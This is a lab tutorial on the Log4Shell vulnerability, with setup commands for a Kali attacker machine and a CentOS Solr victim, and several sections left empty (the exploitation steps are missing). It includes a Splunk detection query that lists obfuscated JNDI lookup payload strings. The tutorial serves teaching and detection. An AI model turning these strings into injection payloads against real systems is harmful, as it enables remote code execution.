Log4Shell

Introduction

On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed “Log4Shell”.

Requirements

  1. kali Linux as attacker.

  2. CentOS with Apache Solr 8.9 or 8.11 as victim.

Prerequisites:

Step 1 – Install Java

The latest version of Apache Solr required Java 8 or greater version to run. Make sure your system fulfills the Java requirements on your system. If Java not installed or you have java 11 do the following. This must be done in both machine CentOS and Kali Linux.

$ sudo mkdir /usr/java
$ cd /usr/java
$ sudo wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ sudo tar xvzf jdk-8u181-linux-x64.tar.gz -C /usr/java
$ JAVA_HOME=/usr/java/jdk1.8.0_181/
$ sudo update-alternatives --install /usr/bin/java java ${JAVA_HOME%*/}/bin/java 20000
$ update-alternatives --config java

you get something like this: 1

Step 2 - Install Apache Solr on CentOS 8

Now download the required Solr version. You may also use the below command to download Apache Solr 8.9.0. or 8.11.0. After that extract the installer script.

wget https://archive.apache.org/dist/lucene/solr/8.9.0//solr-8.9.0.tgz
sudo tar xzf solr-8.9.0.tgz solr-8.9.0/bin/install_solr_service.sh --strip-components=2

Proof of Concept:

The next question is, where could we enter this syntax?
Anywhere that has data logged by the application.

Testing The Vulnerability

Exploitation:

Detection using Splunk:

index="cp_log" ("2021-44228" OR "Log4j" OR "Log4Shell" OR "%24%7bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "%7bjndi:" OR "%7Bjndi:" OR "{base64:JHtqbmRp{env:BARFOO:-j}" OR "{::-j}" OR "{jndi:corba" OR "jndi:dns:/" OR "jndi:iiop" OR "jndi:ldap:/" OR "jndi:ldaps:/" OR "jndi:${lower:" OR "jndi:nds" OR "jndi:nis" OR "jndi:rmi:/" OR "{::-l}${::-d}${::-a}${::-p}" OR "{\:\:-j}")
| convert timeformat="%Y-%m-%d-%H" ctime(_time) AS date
|stats sparkline values(user_agent) count by src_ip, dest_ip, dest_port, date

12

Refer: log-jammin-log4j-2-rce

log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued

Mitigation and Prevention:

IPS Blade in Checkpoint Firewall:

15 16

For other techniques, you are strongly encouraged t do your own research. There is a significant amount of information being shared in this Reddit.

Modify the solr.in.sh file (for solr only):

References: